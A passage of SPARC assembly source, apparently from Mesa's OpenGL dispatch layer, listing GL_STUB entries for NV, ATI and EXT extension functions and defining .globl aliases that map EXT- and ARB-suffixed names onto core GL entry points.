GL_STUB(glWindowPos4dvMESA, _gloffset_WindowPos4dvMESA)
GL_STUB(glWindowPos4fMESA, _gloffset_WindowPos4fMESA)
GL_STUB(glWindowPos4fvMESA, _gloffset_WindowPos4fvMESA)
GL_STUB(glWindowPos4iMESA, _gloffset_WindowPos4iMESA)
GL_STUB(glWindowPos4ivMESA, _gloffset_WindowPos4ivMESA)
GL_STUB(glWindowPos4sMESA, _gloffset_WindowPos4sMESA)
GL_STUB(glWindowPos4svMESA, _gloffset_WindowPos4svMESA)
GL_STUB(gl_dispatch_stub_648, _gloffset__dispatch_stub_648)
GL_STUB(gl_dispatch_stub_649, _gloffset__dispatch_stub_649)
GL_STUB(gl_dispatch_stub_650, _gloffset__dispatch_stub_650)
GL_STUB(gl_dispatch_stub_651, _gloffset__dispatch_stub_651)
GL_STUB(gl_dispatch_stub_652, _gloffset__dispatch_stub_652)
GL_STUB(gl_dispatch_stub_653, _gloffset__dispatch_stub_653)
GL_STUB(gl_dispatch_stub_654, _gloffset__dispatch_stub_654)
GL_STUB(gl_dispatch_stub_655, _gloffset__dispatch_stub_655)
GL_STUB(gl_dispatch_stub_656, _gloffset__dispatch_stub_656)
/* NV_vertex_program */
GL_STUB(glAreProgramsResidentNV, _gloffset_AreProgramsResidentNV)
GL_STUB(glBindProgramNV, _gloffset_BindProgramNV)
GL_STUB(glDeleteProgramsNV, _gloffset_DeleteProgramsNV)
GL_STUB(glExecuteProgramNV, _gloffset_ExecuteProgramNV)
GL_STUB(glGenProgramsNV, _gloffset_GenProgramsNV)
GL_STUB(glGetProgramParameterdvNV, _gloffset_GetProgramParameterdvNV)
GL_STUB(glGetProgramParameterfvNV, _gloffset_GetProgramParameterfvNV)
GL_STUB(glGetProgramStringNV, _gloffset_GetProgramStringNV)
GL_STUB(glGetProgramivNV, _gloffset_GetProgramivNV)
GL_STUB(glGetTrackMatrixivNV, _gloffset_GetTrackMatrixivNV)
GL_STUB(glGetVertexAttribPointervNV, _gloffset_GetVertexAttribPointervNV)
GL_STUB(glGetVertexAttribdvNV, _gloffset_GetVertexAttribdvNV)
GL_STUB(glGetVertexAttribfvNV, _gloffset_GetVertexAttribfvNV)
GL_STUB(glGetVertexAttribivNV, _gloffset_GetVertexAttribivNV)
GL_STUB(glIsProgramNV, _gloffset_IsProgramNV)
GL_STUB(glLoadProgramNV, _gloffset_LoadProgramNV)
GL_STUB(glProgramParameters4dvNV, _gloffset_ProgramParameters4dvNV)
GL_STUB(glProgramParameters4fvNV, _gloffset_ProgramParameters4fvNV)
GL_STUB(glRequestResidentProgramsNV, _gloffset_RequestResidentProgramsNV)
GL_STUB(glTrackMatrixNV, _gloffset_TrackMatrixNV)
GL_STUB(glVertexAttrib1dNV, _gloffset_VertexAttrib1dNV)
GL_STUB(glVertexAttrib1dvNV, _gloffset_VertexAttrib1dvNV)
GL_STUB(glVertexAttrib1fNV, _gloffset_VertexAttrib1fNV)
GL_STUB(glVertexAttrib1fvNV, _gloffset_VertexAttrib1fvNV)
GL_STUB(glVertexAttrib1sNV, _gloffset_VertexAttrib1sNV)
GL_STUB(glVertexAttrib1svNV, _gloffset_VertexAttrib1svNV)
GL_STUB(glVertexAttrib2dNV, _gloffset_VertexAttrib2dNV)
GL_STUB(glVertexAttrib2dvNV, _gloffset_VertexAttrib2dvNV)
GL_STUB(glVertexAttrib2fNV, _gloffset_VertexAttrib2fNV)
GL_STUB(glVertexAttrib2fvNV, _gloffset_VertexAttrib2fvNV)
GL_STUB(glVertexAttrib2sNV, _gloffset_VertexAttrib2sNV)
GL_STUB(glVertexAttrib2svNV, _gloffset_VertexAttrib2svNV)
GL_STUB(glVertexAttrib3dNV, _gloffset_VertexAttrib3dNV)
GL_STUB(glVertexAttrib3dvNV, _gloffset_VertexAttrib3dvNV)
GL_STUB(glVertexAttrib3fNV, _gloffset_VertexAttrib3fNV)
GL_STUB(glVertexAttrib3fvNV, _gloffset_VertexAttrib3fvNV)
GL_STUB(glVertexAttrib3sNV, _gloffset_VertexAttrib3sNV)
GL_STUB(glVertexAttrib3svNV, _gloffset_VertexAttrib3svNV)
GL_STUB(glVertexAttrib4dNV, _gloffset_VertexAttrib4dNV)
GL_STUB(glVertexAttrib4dvNV, _gloffset_VertexAttrib4dvNV)
GL_STUB(glVertexAttrib4fNV, _gloffset_VertexAttrib4fNV)
GL_STUB(glVertexAttrib4fvNV, _gloffset_VertexAttrib4fvNV)
GL_STUB(glVertexAttrib4sNV, _gloffset_VertexAttrib4sNV)
GL_STUB(glVertexAttrib4svNV, _gloffset_VertexAttrib4svNV)
GL_STUB(glVertexAttrib4ubNV, _gloffset_VertexAttrib4ubNV)
GL_STUB(glVertexAttrib4ubvNV, _gloffset_VertexAttrib4ubvNV)
GL_STUB(glVertexAttribPointerNV, _gloffset_VertexAttribPointerNV)
GL_STUB(glVertexAttribs1dvNV, _gloffset_VertexAttribs1dvNV)
GL_STUB(glVertexAttribs1fvNV, _gloffset_VertexAttribs1fvNV)
GL_STUB(glVertexAttribs1svNV, _gloffset_VertexAttribs1svNV)
GL_STUB(glVertexAttribs2dvNV, _gloffset_VertexAttribs2dvNV)
GL_STUB(glVertexAttribs2fvNV, _gloffset_VertexAttribs2fvNV)
GL_STUB(glVertexAttribs2svNV, _gloffset_VertexAttribs2svNV)
GL_STUB(glVertexAttribs3dvNV, _gloffset_VertexAttribs3dvNV)
GL_STUB(glVertexAttribs3fvNV, _gloffset_VertexAttribs3fvNV)
GL_STUB(glVertexAttribs3svNV, _gloffset_VertexAttribs3svNV)
GL_STUB(glVertexAttribs4dvNV, _gloffset_VertexAttribs4dvNV)
GL_STUB(glVertexAttribs4fvNV, _gloffset_VertexAttribs4fvNV)
GL_STUB(glVertexAttribs4svNV, _gloffset_VertexAttribs4svNV)
GL_STUB(glVertexAttribs4ubvNV, _gloffset_VertexAttribs4ubvNV)
/* ATI_fragment_shader */
GL_STUB(glAlphaFragmentOp1ATI, _gloffset_AlphaFragmentOp1ATI)
GL_STUB(glAlphaFragmentOp2ATI, _gloffset_AlphaFragmentOp2ATI)
GL_STUB(glAlphaFragmentOp3ATI, _gloffset_AlphaFragmentOp3ATI)
GL_STUB(glBeginFragmentShaderATI, _gloffset_BeginFragmentShaderATI)
GL_STUB(glBindFragmentShaderATI, _gloffset_BindFragmentShaderATI)
GL_STUB(glColorFragmentOp1ATI, _gloffset_ColorFragmentOp1ATI)
GL_STUB(glColorFragmentOp2ATI, _gloffset_ColorFragmentOp2ATI)
GL_STUB(glColorFragmentOp3ATI, _gloffset_ColorFragmentOp3ATI)
GL_STUB(glDeleteFragmentShaderATI, _gloffset_DeleteFragmentShaderATI)
GL_STUB(glEndFragmentShaderATI, _gloffset_EndFragmentShaderATI)
GL_STUB(glGenFragmentShadersATI, _gloffset_GenFragmentShadersATI)
GL_STUB(glPassTexCoordATI, _gloffset_PassTexCoordATI)
GL_STUB(glSampleMapATI, _gloffset_SampleMapATI)
GL_STUB(glSetFragmentShaderConstantATI, _gloffset_SetFragmentShaderConstantATI)
GL_STUB(glPointParameteriNV, _gloffset_PointParameteriNV)
GL_STUB(glPointParameterivNV, _gloffset_PointParameterivNV)
GL_STUB(gl_dispatch_stub_733, _gloffset__dispatch_stub_733)
GL_STUB(gl_dispatch_stub_734, _gloffset__dispatch_stub_734)
GL_STUB(gl_dispatch_stub_735, _gloffset__dispatch_stub_735)
GL_STUB(gl_dispatch_stub_736, _gloffset__dispatch_stub_736)
GL_STUB(gl_dispatch_stub_737, _gloffset__dispatch_stub_737)
/* NV_fragment_program named parameters */
GL_STUB(glGetProgramNamedParameterdvNV, _gloffset_GetProgramNamedParameterdvNV)
GL_STUB(glGetProgramNamedParameterfvNV, _gloffset_GetProgramNamedParameterfvNV)
GL_STUB(glProgramNamedParameter4dNV, _gloffset_ProgramNamedParameter4dNV)
GL_STUB(glProgramNamedParameter4dvNV, _gloffset_ProgramNamedParameter4dvNV)
GL_STUB(glProgramNamedParameter4fNV, _gloffset_ProgramNamedParameter4fNV)
GL_STUB(glProgramNamedParameter4fvNV, _gloffset_ProgramNamedParameter4fvNV)
GL_STUB(gl_dispatch_stub_744, _gloffset__dispatch_stub_744)
GL_STUB(gl_dispatch_stub_745, _gloffset__dispatch_stub_745)
/* EXT_framebuffer_object */
GL_STUB(glBindFramebufferEXT, _gloffset_BindFramebufferEXT)
GL_STUB(glBindRenderbufferEXT, _gloffset_BindRenderbufferEXT)
GL_STUB(glCheckFramebufferStatusEXT, _gloffset_CheckFramebufferStatusEXT)
GL_STUB(glDeleteFramebuffersEXT, _gloffset_DeleteFramebuffersEXT)
GL_STUB(glDeleteRenderbuffersEXT, _gloffset_DeleteRenderbuffersEXT)
GL_STUB(glFramebufferRenderbufferEXT, _gloffset_FramebufferRenderbufferEXT)
GL_STUB(glFramebufferTexture1DEXT, _gloffset_FramebufferTexture1DEXT)
GL_STUB(glFramebufferTexture2DEXT, _gloffset_FramebufferTexture2DEXT)
GL_STUB(glFramebufferTexture3DEXT, _gloffset_FramebufferTexture3DEXT)
GL_STUB(glGenFramebuffersEXT, _gloffset_GenFramebuffersEXT)
GL_STUB(glGenRenderbuffersEXT, _gloffset_GenRenderbuffersEXT)
GL_STUB(glGenerateMipmapEXT, _gloffset_GenerateMipmapEXT)
GL_STUB(glGetFramebufferAttachmentParameterivEXT, _gloffset_GetFramebufferAttachmentParameterivEXT)
GL_STUB(glGetRenderbufferParameterivEXT, _gloffset_GetRenderbufferParameterivEXT)
GL_STUB(glIsFramebufferEXT, _gloffset_IsFramebufferEXT)
GL_STUB(glIsRenderbufferEXT, _gloffset_IsRenderbufferEXT)
GL_STUB(glRenderbufferStorageEXT, _gloffset_RenderbufferStorageEXT)
GL_STUB(gl_dispatch_stub_763, _gloffset__dispatch_stub_763)
GL_STUB(glFramebufferTextureLayerEXT, _gloffset_FramebufferTextureLayerEXT)
GL_STUB(gl_dispatch_stub_765, _gloffset__dispatch_stub_765)
GL_STUB(gl_dispatch_stub_766, _gloffset__dispatch_stub_766)
GL_STUB(gl_dispatch_stub_767, _gloffset__dispatch_stub_767)
GL_STUB(gl_dispatch_stub_768, _gloffset__dispatch_stub_768)
GL_STUB(gl_dispatch_stub_769, _gloffset__dispatch_stub_769)
/*
 * End-of-table sentinel: marks the first byte past the last generated stub.
 * NOTE(review): presumably paired with a _mesa_sparc_glapi_begin label
 * (earlier in the file, outside this view) so runtime code can size or
 * patch the stub region — confirm against the begin label's definition.
 */
.globl _mesa_sparc_glapi_end ; .type _mesa_sparc_glapi_end,#function
_mesa_sparc_glapi_end:
/*
 * Legacy EXT-suffixed aliases for entry points that were promoted to core
 * GL. Each line exports the EXT name as a global function symbol and binds
 * it (via the assembler's `sym = target` symbol assignment) to the core
 * stub defined above, so both names resolve to the same code.
 *
 * NOTE(review): the #ifndef GLX_INDIRECT_RENDERING guards omit certain
 * aliases in indirect-rendering builds — presumably because those entry
 * points are provided separately there; confirm against the build that
 * defines GLX_INDIRECT_RENDERING.
 *
 * (`;` is a statement separator in GAS, not a comment — each line holds
 * three directives.)
 */
.globl glArrayElementEXT ; .type glArrayElementEXT,#function ; glArrayElementEXT = glArrayElement
.globl glBindTextureEXT ; .type glBindTextureEXT,#function ; glBindTextureEXT = glBindTexture
.globl glDrawArraysEXT ; .type glDrawArraysEXT,#function ; glDrawArraysEXT = glDrawArrays
#ifndef GLX_INDIRECT_RENDERING
.globl glAreTexturesResidentEXT ; .type glAreTexturesResidentEXT,#function ; glAreTexturesResidentEXT = glAreTexturesResident
#endif
.globl glCopyTexImage1DEXT ; .type glCopyTexImage1DEXT,#function ; glCopyTexImage1DEXT = glCopyTexImage1D
.globl glCopyTexImage2DEXT ; .type glCopyTexImage2DEXT,#function ; glCopyTexImage2DEXT = glCopyTexImage2D
.globl glCopyTexSubImage1DEXT ; .type glCopyTexSubImage1DEXT,#function ; glCopyTexSubImage1DEXT = glCopyTexSubImage1D
.globl glCopyTexSubImage2DEXT ; .type glCopyTexSubImage2DEXT,#function ; glCopyTexSubImage2DEXT = glCopyTexSubImage2D
#ifndef GLX_INDIRECT_RENDERING
.globl glDeleteTexturesEXT ; .type glDeleteTexturesEXT,#function ; glDeleteTexturesEXT = glDeleteTextures
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl glGenTexturesEXT ; .type glGenTexturesEXT,#function ; glGenTexturesEXT = glGenTextures
#endif
.globl glGetPointervEXT ; .type glGetPointervEXT,#function ; glGetPointervEXT = glGetPointerv
#ifndef GLX_INDIRECT_RENDERING
.globl glIsTextureEXT ; .type glIsTextureEXT,#function ; glIsTextureEXT = glIsTexture
#endif
.globl glPrioritizeTexturesEXT ; .type glPrioritizeTexturesEXT,#function ; glPrioritizeTexturesEXT = glPrioritizeTextures
.globl glTexSubImage1DEXT ; .type glTexSubImage1DEXT,#function ; glTexSubImage1DEXT = glTexSubImage1D
.globl glTexSubImage2DEXT ; .type glTexSubImage2DEXT,#function ; glTexSubImage2DEXT = glTexSubImage2D
.globl glBlendColorEXT ; .type glBlendColorEXT,#function ; glBlendColorEXT = glBlendColor
.globl glBlendEquationEXT ; .type glBlendEquationEXT,#function ; glBlendEquationEXT = glBlendEquation
.globl glDrawRangeElementsEXT ; .type glDrawRangeElementsEXT,#function ; glDrawRangeElementsEXT = glDrawRangeElements
.globl glColorTableEXT ; .type glColorTableEXT,#function ; glColorTableEXT = glColorTable
#ifndef GLX_INDIRECT_RENDERING
.globl glGetColorTableEXT ; .type glGetColorTableEXT,#function ; glGetColorTableEXT = glGetColorTable
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl glGetColorTableParameterfvEXT ; .type glGetColorTableParameterfvEXT,#function ; glGetColorTableParameterfvEXT = glGetColorTableParameterfv
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl glGetColorTableParameterivEXT ; .type glGetColorTableParameterivEXT,#function ; glGetColorTableParameterivEXT = glGetColorTableParameteriv
#endif
.globl glTexImage3DEXT ; .type glTexImage3DEXT,#function ; glTexImage3DEXT = glTexImage3D
.globl glTexSubImage3DEXT ; .type glTexSubImage3DEXT,#function ; glTexSubImage3DEXT = glTexSubImage3D
.globl glCopyTexSubImage3DEXT ; .type glCopyTexSubImage3DEXT,#function ; glCopyTexSubImage3DEXT = glCopyTexSubImage3D
.globl glActiveTexture ; .type glActiveTexture,#function ; glActiveTexture = glActiveTextureARB
.globl glClientActiveTexture ; .type glClientActiveTexture,#function ; glClientActiveTexture = glClientActiveTextureARB
.globl glMultiTexCoord1d ; .type glMultiTexCoord1d,#function ; glMultiTexCoord1d = glMultiTexCoord1dARB
.globl glMultiTexCoord1dv ; .type glMultiTexCoord1dv,#function ; glMultiTexCoord1dv = glMultiTexCoord1dvARB
.globl glMultiTexCoord1f ; .type glMultiTexCoord1f,#function ; glMultiTexCoord1f = glMultiTexCoord1fARB
.globl glMultiTexCoord1fv ; .type glMultiTexCoord1fv,#function ; glMultiTexCoord1fv = glMultiTexCoord1fvARB
.globl glMultiTexCoord1i ; .type glMultiTexCoord1i,#function ; glMultiTexCoord1i = glMultiTexCoord1iARB
.globl glMultiTexCoord1iv ; .type glMultiTexCoord1iv,#function ; glMultiTexCoord1iv = glMultiTexCoord1ivARB
.globl glMultiTexCoord1s ; .type glMultiTexCoord1s,#function ; glMultiTexCoord1s = glMultiTexCoord1sARB
.globl glMultiTexCoord1sv ; .type glMultiTexCoord1sv,#function ; glMultiTexCoord1sv = glMultiTexCoord1svARB
.globl glMultiTexCoord2d ; .type glMultiTexCoord2d,#function ; glMultiTexCoord2d = glMultiTexCoord2dARB
.globl glMultiTexCoord2dv ; .type glMultiTexCoord2dv,#function ; glMultiTexCoord2dv = glMultiTexCoord2dvARB
.globl glMultiTexCoord2f ; .type glMultiTexCoord2f,#function ; glMultiTexCoord2f = glMultiTexCoord2fARB
.globl glMultiTexCoord2fv ; .type glMultiTexCoord2fv,#function ; glMultiTexCoord2fv = glMultiTexCoord2fvARB
.globl glMultiTexCoord2i ; .type glMultiTexCoord2i,#function ; glMultiTexCoord2i = glMultiTexCoord2iARB
.globl glMultiTexCoord2iv ; .type glMultiTexCoord2iv,#function ; glMultiTexCoord2iv = glMultiTexCoord2ivARB
.globl glMultiTexCoord2s ; .type glMultiTexCoord2s,#function ; glMultiTexCoord2s = glMultiTexCoord2sARB
.globl glMultiTexCoord2sv ; .type glMultiTexCoord2sv,#function ; glMultiTexCoord2sv = glMultiTexCoord2svARB
.globl glMultiTexCoord3d ; .type glMultiTexCoord3d,#function ; glMultiTexCoord3d = glMultiTexCoord3dARB
.globl glMultiTexCoord3dv ; .type glMultiTexCoord3dv,#function ; glMultiTexCoord3dv = glMultiTexCoord3dvARB
.globl glMultiTexCoord3f ; .type glMultiTexCoord3f,#function ; glMultiTexCoord3f = glMultiTexCoord3fARB
.globl glMultiTexCoord3fv ; .type glMultiTexCoord3fv,#function ; glMultiTexCoord3fv = glMultiTexCoord3fvARB
.globl glMultiTexCoord3i ; .type glMultiTexCoord3i,#function ; glMultiTexCoord3i = glMultiTexCoord3iARB
.globl glMultiTexCoord3iv ; .type glMultiTexCoord3iv,#function ; glMultiTexCoord3iv = glMultiTexCoord3ivARB
.globl glMultiTexCoord3s ; .type glMultiTexCoord3s,#function ; glMultiTexCoord3s = glMultiTexCoord3sARB
.globl glMultiTexCoord3sv ; .type glMultiTexCoord3sv,#function ; glMultiTexCoord3sv = glMultiTexCoord3svARB
.globl glMultiTexCoord4d ; .type glMultiTexCoord4d,#function ; glMultiTexCoord4d = glMultiTexCoord4dARB
.globl glMultiTexCoord4dv ; .type glMultiTexCoord4dv,#function ; glMultiTexCoord4dv = glMultiTexCoord4dvARB
.globl glMultiTexCoord4f ; .type glMultiTexCoord4f,#function ; glMultiTexCoord4f = glMultiTexCoord4fARB
.globl glMultiTexCoord4fv ; .type glMultiTexCoord4fv,#function ; glMultiTexCoord4fv = glMultiTexCoord4fvARB
.globl glMultiTexCoord4i ; .type glMultiTexCoord4i,#function ; glMultiTexCoord4i = glMultiTexCoord4iARB
.globl glMultiTexCoord4iv ; .type glMultiTexCoord4iv,#function ; glMultiTexCoord4iv = glMultiTexCoord4ivARB
.globl glMultiTexCoord4s ; .type glMultiTexCoord4s,#function ; glMultiTexCoord4s = glMultiTexCoord4sARB
.globl glMultiTexCoord4sv ; .type glMultiTexCoord4sv,#function ; glMultiTexCoord4sv = glMultiTexCoord4svARB
.globl glLoadTransposeMatrixd ; .type glLoadTransposeMatrixd,#function ; glLoadTransposeMatrixd = glLoadTransposeMatrixdARB
.globl glLoadTransposeMatrixf ; .type glLoadTransposeMatrixf,#function ; glLoadTransposeMatrixf = glLoadTransposeMatrixfARB
.globl glMultTransposeMatrixd ; .type glMultTransposeMatrixd,#function ; glMultTransposeMatrixd = glMultTransposeMatrixdARB
.globl glMultTransposeMatrixf ; .type glMultTransposeMatrixf,#function ; glMultTransposeMatrixf = glMultTransposeMatrixfARB
.globl glSampleCoverage ; .type glSampleCoverage,#function ; glSampleCoverage = glSampleCoverageARB
.globl glCompressedTexImage1D ; .type glCompressedTexImage1D,#function ; glCompressedTexImage1D = glCompressedTexImage1DARB
.globl glCompressedTexImage2D ; .type glCompressedTexImage2D,#function ; glCompressedTexImage2D = glCompressedTexImage2DARB
.globl glCompressedTexImage3D ; .type glCompressedTexImage3D,#function ; glCompressedTexImage3D = glCompressedTexImage3DARB
.globl glCompressedTexSubImage1D ; .type glCompressedTexSubImage1D,#function ; glCompressedTexSubImage1D = glCompressedTexSubImage1DARB
.globl glCompressedTexSubImage2D ; .type glCompressedTexSubImage2D,#function ; glCompressedTexSubImage2D = glCompressedTexSubImage2DARB
.globl glCompressedTexSubImage3D ; .type glCompressedTexSubImage3D,#function ; glCompressedTexSubImage3D = glCompressedTexSubImage3DARB
.globl glGetCompressedTexImage ; .type glGetCompressedTexImage,#function ; glGetCompressedTexImage = glGetCompressedTexImageARB
.globl glDisableVertexAttribArray ; .type glDisableVertexAttribArray,#function ; glDisableVertexAttribArray = glDisableVertexAttribArrayARB
.globl glEnableVertexAttribArray ; .type glEnableVertexAttribArray,#function ; glEnableVertexAttribArray = glEnableVertexAttribArrayARB
.globl glGetVertexAttribdv ; .type glGetVertexAttribdv,#function ; glGetVertexAttribdv = glGetVertexAttribdvARB
.globl glGetVertexAttribfv ; .type glGetVertexAttribfv,#function ; glGetVertexAttribfv = glGetVertexAttribfvARB
.globl glGetVertexAttribiv ; .type glGetVertexAttribiv,#function ; glGetVertexAttribiv = glGetVertexAttribivARB
.globl glProgramParameter4dNV ; .type glProgramParameter4dNV,#function ; glProgramParameter4dNV = glProgramEnvParameter4dARB
.globl glProgramParameter4dvNV ; .type glProgramParameter4dvNV,#function ; glProgramParameter4dvNV = glProgramEnvParameter4dvARB
.globl glProgramParameter4fNV ; .type glProgramParameter4fNV,#function ; glProgramParameter4fNV = glProgramEnvParameter4fARB
.globl glProgramParameter4fvNV ; .type glProgramParameter4fvNV,#function ; glProgramParameter4fvNV = glProgramEnvParameter4fvARB
.globl glVertexAttrib1d ; .type glVertexAttrib1d,#function ; glVertexAttrib1d = glVertexAttrib1dARB
.globl glVertexAttrib1dv ; .type glVertexAttrib1dv,#function ; glVertexAttrib1dv = glVertexAttrib1dvARB
.globl glVertexAttrib1f ; .type glVertexAttrib1f,#function ; glVertexAttrib1f = glVertexAttrib1fARB
.globl glVertexAttrib1fv ; .type glVertexAttrib1fv,#function ; glVertexAttrib1fv = glVertexAttrib1fvARB
.globl glVertexAttrib1s ; .type glVertexAttrib1s,#function ; glVertexAttrib1s = glVertexAttrib1sARB
.globl glVertexAttrib1sv ; .type glVertexAttrib1sv,#function ; glVertexAttrib1sv = glVertexAttrib1svARB
.globl glVertexAttrib2d ; .type glVertexAttrib2d,#function ; glVertexAttrib2d = glVertexAttrib2dARB
.globl glVertexAttrib2dv ; .type glVertexAttrib2dv,#function ; glVertexAttrib2dv = glVertexAttrib2dvARB
.globl glVertexAttrib2f ; .type glVertexAttrib2f,#function ; glVertexAttrib2f = glVertexAttrib2fARB
.globl glVertexAttrib2fv ; .type glVertexAttrib2fv,#function ; glVertexAttrib2fv = glVertexAttrib2fvARB
.globl glVertexAttrib2s ; .type glVertexAttrib2s,#function ; glVertexAttrib2s = glVertexAttrib2sARB
.globl glVertexAttrib2sv ; .type glVertexAttrib2sv,#function ; glVertexAttrib2sv = glVertexAttrib2svARB
.globl glVertexAttrib3d ; .type glVertexAttrib3d,#function ; glVertexAttrib3d = glVertexAttrib3dARB
.globl glVertexAttrib3dv ; .type glVertexAttrib3dv,#function ; glVertexAttrib3dv = glVertexAttrib3dvARB
.globl glVertexAttrib3f ; .type glVertexAttrib3f,#function ; glVertexAttrib3f = glVertexAttrib3fARB
.globl glVertexAttrib3fv ; .type glVertexAttrib3fv,#function ; glVertexAttrib3fv = glVertexAttrib3fvARB
.globl glVertexAttrib3s ; .type glVertexAttrib3s,#function ; glVertexAttrib3s = glVertexAttrib3sARB
.globl glVertexAttrib3sv ; .type glVertexAttrib3sv,#function ; glVertexAttrib3sv = glVertexAttrib3svARB
.globl glVertexAttrib4Nbv ; .type glVertexAttrib4Nbv,#function ; glVertexAttrib4Nbv = glVertexAttrib4NbvARB
.globl glVertexAttrib4Niv ; .type glVertexAttrib4Niv,#function ; glVertexAttrib4Niv = glVertexAttrib4NivARB
.globl glVertexAttrib4Nsv ; .type glVertexAttrib4Nsv,#function ; glVertexAttrib4Nsv = glVertexAttrib4NsvARB
.globl glVertexAttrib4Nub ; .type glVertexAttrib4Nub,#function ; glVertexAttrib4Nub = glVertexAttrib4NubARB
.globl glVertexAttrib4Nubv ; .type glVertexAttrib4Nubv,#function ; glVertexAttrib4Nubv = glVertexAttrib4NubvARB
.globl glVertexAttrib4Nuiv ; .type glVertexAttrib4Nuiv,#function ; glVertexAttrib4Nuiv = glVertexAttrib4NuivARB
.globl glVertexAttrib4Nusv ; .type glVertexAttrib4Nusv,#function ; glVertexAttrib4Nusv = glVertexAttrib4NusvARB
.globl glVertexAttrib4bv ; .type glVertexAttrib4bv,#function ; glVertexAttrib4bv = glVertexAttrib4bvARB
.globl glVertexAttrib4d ; .type glVertexAttrib4d,#function ; glVertexAttrib4d = glVertexAttrib4dARB
.globl glVertexAttrib4dv ; .type glVertexAttrib4dv,#function ; glVertexAttrib4dv = glVertexAttrib4dvARB
.globl glVertexAttrib4f ; .type glVertexAttrib4f,#function ; glVertexAttrib4f = glVertexAttrib4fARB
.globl glVertexAttrib4fv ; .type glVertexAttrib4fv,#function ; glVertexAttrib4fv = glVertexAttrib4fvARB
.globl glVertexAttrib4iv ; .type glVertexAttrib4iv,#function ; glVertexAttrib4iv = glVertexAttrib4ivARB
.globl glVertexAttrib4s ; .type glVertexAttrib4s,#function ; glVertexAttrib4s = glVertexAttrib4sARB
.globl glVertexAttrib4sv ; .type glVertexAttrib4sv,#function ; glVertexAttrib4sv = glVertexAttrib4svARB
.globl glVertexAttrib4ubv ; .type glVertexAttrib4ubv,#function ; glVertexAttrib4ubv = glVertexAttrib4ubvARB
.globl glVertexAttrib4uiv ; .type glVertexAttrib4uiv,#function ; glVertexAttrib4uiv = glVertexAttrib4uivARB
.globl glVertexAttrib4usv ; .type glVertexAttrib4usv,#function ; glVertexAttrib4usv = glVertexAttrib4usvARB
.globl glVertexAttribPointer ; .type glVertexAttribPointer,#function ; glVertexAttribPointer = glVertexAttribPointerARB
.globl glBindBuffer ; .type glBindBuffer,#function ; glBindBuffer = glBindBufferARB
.globl glBufferData ; .type glBufferData,#function ; glBufferData = glBufferDataARB
.globl glBufferSubData ; .type glBufferSubData,#function ; glBufferSubData = glBufferSubDataARB
.globl glDeleteBuffers ; .type glDeleteBuffers,#function ; glDeleteBuffers = glDeleteBuffersARB
.globl glGenBuffers ; .type glGenBuffers,#function ; glGenBuffers = glGenBuffersARB
.globl glGetBufferParameteriv ; .type glGetBufferParameteriv,#function ; glGetBufferParameteriv = glGetBufferParameterivARB
.globl glGetBufferPointerv ; .type glGetBufferPointerv,#function ; glGetBufferPointerv = glGetBufferPointervARB
.globl glGetBufferSubData ; .type glGetBufferSubData,#function ; glGetBufferSubData = glGetBufferSubDataARB
.globl glIsBuffer ; .type glIsBuffer,#function ; glIsBuffer = glIsBufferARB
.globl glMapBuffer ; .type glMapBuffer,#function ; glMapBuffer = glMapBufferARB
.globl glUnmapBuffer ; .type glUnmapBuffer,#function ; glUnmapBuffer = glUnmapBufferARB
.globl glBeginQuery ; .type glBeginQuery,#function ; glBeginQuery = glBeginQueryARB
.globl glDeleteQueries ; .type glDeleteQueries,#function ; glDeleteQueries = glDeleteQueriesARB
.globl glEndQuery ; .type glEndQuery,#function ; glEndQuery = glEndQueryARB
.globl glGenQueries ; .type glGenQueries,#function ; glGenQueries = glGenQueriesARB
.globl glGetQueryObjectiv ; .type glGetQueryObjectiv,#function ; glGetQueryObjectiv = glGetQueryObjectivARB
.globl glGetQueryObjectuiv ; .type glGetQueryObjectuiv,#function ; glGetQueryObjectuiv = glGetQueryObjectuivARB
.globl glGetQueryiv ; .type glGetQueryiv,#function ; glGetQueryiv = glGetQueryivARB
.globl glIsQuery ; .type glIsQuery,#function ; glIsQuery = glIsQueryARB
.globl glCompileShader ; .type glCompileShader,#function ; glCompileShader = glCompileShaderARB
.globl glGetActiveUniform ; .type glGetActiveUniform,#function ; glGetActiveUniform = glGetActiveUniformARB
.globl glGetShaderSource ; .type glGetShaderSource,#function ; glGetShaderSource = glGetShaderSourceARB
.globl glGetUniformLocation ; .type glGetUniformLocation,#function ; glGetUniformLocation = glGetUniformLocationARB
.globl glGetUniformfv ; .type glGetUniformfv,#function ; glGetUniformfv = glGetUniformfvARB
.globl glGetUniformiv ; .type glGetUniformiv,#function ; glGetUniformiv = glGetUniformivARB
.globl glLinkProgram ; .type glLinkProgram,#function ; glLinkProgram = glLinkProgramARB
.globl glShaderSource ; .type glShaderSource,#function ; glShaderSource = glShaderSourceARB
.globl glUniform1f ; .type glUniform1f,#function ; glUniform1f = glUniform1fARB
.globl glUniform1fv ; .type glUniform1fv,#function ; glUniform1fv = glUniform1fvARB
.globl glUniform1i ; .type glUniform1i,#function ; glUniform1i = glUniform1iARB
.globl glUniform1iv ; .type glUniform1iv,#function ; glUniform1iv = glUniform1ivARB
.globl glUniform2f ; .type glUniform2f,#function ; glUniform2f = glUniform2fARB
.globl glUniform2fv ; .type glUniform2fv,#function ; glUniform2fv = glUniform2fvARB
.globl glUniform2i ; .type glUniform2i,#function ; glUniform2i = glUniform2iARB
.globl glUniform2iv ; .type glUniform2iv,#function ; glUniform2iv = glUniform2ivARB
.globl glUniform3f ; .type glUniform3f,#function ; glUniform3f = glUniform3fARB
.globl glUniform3fv ; .type glUniform3fv,#function ; glUniform3fv = glUniform3fvARB
.globl glUniform3i ; .type glUniform3i,#function ; glUniform3i = glUniform3iARB
.globl glUniform3iv ; .type glUniform3iv,#function ; glUniform3iv = glUniform3ivARB
.globl glUniform4f ; .type glUniform4f,#function ; glUniform4f = glUniform4fARB
.globl glUniform4fv ; .type glUniform4fv,#function ; glUniform4fv = glUniform4fvARB
.globl glUniform4i ; .type glUniform4i,#function ; glUniform4i = glUniform4iARB
.globl glUniform4iv ; .type glUniform4iv,#function ; glUniform4iv = glUniform4ivARB
.globl glUniformMatrix2fv ; .type glUniformMatrix2fv,#function ; glUniformMatrix2fv = glUniformMatrix2fvARB
.globl glUniformMatrix3fv ; .type glUniformMatrix3fv,#function ; glUniformMatrix3fv = glUniformMatrix3fvARB
.globl glUniformMatrix4fv ; .type glUniformMatrix4fv,#function ; glUniformMatrix4fv = glUniformMatrix4fvARB
.globl glUseProgram ; .type glUseProgram,#function ; glUseProgram = glUseProgramObjectARB
